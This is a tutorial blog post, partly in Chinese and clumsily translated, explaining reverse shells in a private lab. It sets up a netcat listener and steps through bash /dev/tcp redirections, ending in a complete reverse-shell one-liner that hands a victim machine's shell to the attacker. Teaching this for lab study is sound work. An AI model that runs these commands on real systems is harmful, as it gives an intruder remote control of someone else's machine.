Article Directory
What is a rebound shell
The reverse shell (reverse shell) means that the control terminal listens on a certain TCP/UDP port, and the controlled terminal initiates a request to the port, and transfers the input and output of its command line to the control terminal. The reverse shell corresponds to standard shells such as telnet and ssh, and is essentially the role reversal of the client and server of the network concept.
There are a lot of terminology, and my understanding is that the victim's shell authority is transferred to the attacker, and the attacker can directly control the victim's Shell to operate. Of course, this needs to be obtained by the attacker in other ways.
Bounce Shell Experiment
Main command:
nc -lvp 端口号
# -l 监听,-v 输出交互或出错信息,-p 端口。nc是netcat的简写,可实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口。
bash -i
# -i interactive。即产生一个交互式的shell(bash)。
/dev/tcp/IP地址/端口号
#特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。打开这个文件就相当于发出了一个socket调用并建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。
Implementation process:
Attacker kali: 192.168.56.105
Victim ubuntu: 192.168.56.108
The attacker command has only one command to execute, and it must be executed at the very beginning. The following three experiments need to be executed once before starting, and always listen to port 5566:
nc -lvp 5566
The victim actively requests to connect to the attacker:
Now show three different commands, step by step, to obtain all shell permissions.
Before starting to talk, you need to know the relevant information of the file descriptor
一、在 shell 程式中,最常使用的 FD (file descriptor) 大概有三个, 分别是:
0 是一个文件描述符,表示标准输入(stdin)
1 是一个文件描述符,表示标准输出(stdout)
2 是一个文件描述符,表示标准错误(stderr)
二、>是重定向符,就是把前面输出的内容重定向到后面指定的位置
三、& 是一个描述符,如果1或2前不加&,会被当成一个普通文件
1. Redirect standard output information to the attack machine
bash -i > /dev/tcp/192.168.56.105/5566
At this time, the victim is connected to the attacking plane, but the attacking plane inputs commands, but the victim plane does not respond. When the victim plane inputs commands, the attacking plane has output information, that is:
本条命令仅仅是将受害机正确命令的返回信息传递给攻击机,攻击机无法对受害机进行任何操作,同时受害机无法在终端显示正确命令的返回信息,但是可以获得报错信息
2. Redirect the standard input information to the attack machine
bash -i < /dev/tcp/192.168.56.105/5566
At this time, the victim is connected to the attacking machine, but the attacking machine inputs commands, and the victim machine responds. When the victim machine receives the command, the terminal of the victim machine has output, and the attacking machine cannot display the command output information.
本条命令是将受害者将攻击机的输入作为shell命令执行,返回值在受害机终端展示,同时受害机输入命令,终端不响应。
3. Redirect standard input and output information to the attack aircraft
bash -i > /dev/tcp/192.168.56.105/5566 0>&1
At this time, the victim is connected to the attacking machine, but the attacking machine inputs a command, the victim executes the response, and the terminal of the victim machine displays the command. After execution, the victim terminal does not display the output information, but the wrong command will display an error message.
本条命令是将shell的输入和输出转交给了攻击机,错误输出并未转移,同时受害机输入命令,终端不响应。
4. Redirect standard input and output error messages to the attacking machine
bash -i > /dev/tcp/192.168.56.105/5566 0>&1 2>&1
At this time, the victim is connected to the attacking machine, but the attacking machine inputs commands, the victim executes the response, the terminal of the victim machine does not display commands, and the victim does not display output information and error messages at the same time.
本条命令是将shell的输入和输出转交给了攻击机,错误输出也一并进行了转移,shell完全由攻击机所控制。
epilogue
I am a bit confused as I write, and I don’t know how to read the link below. I refer to the
QAQ they made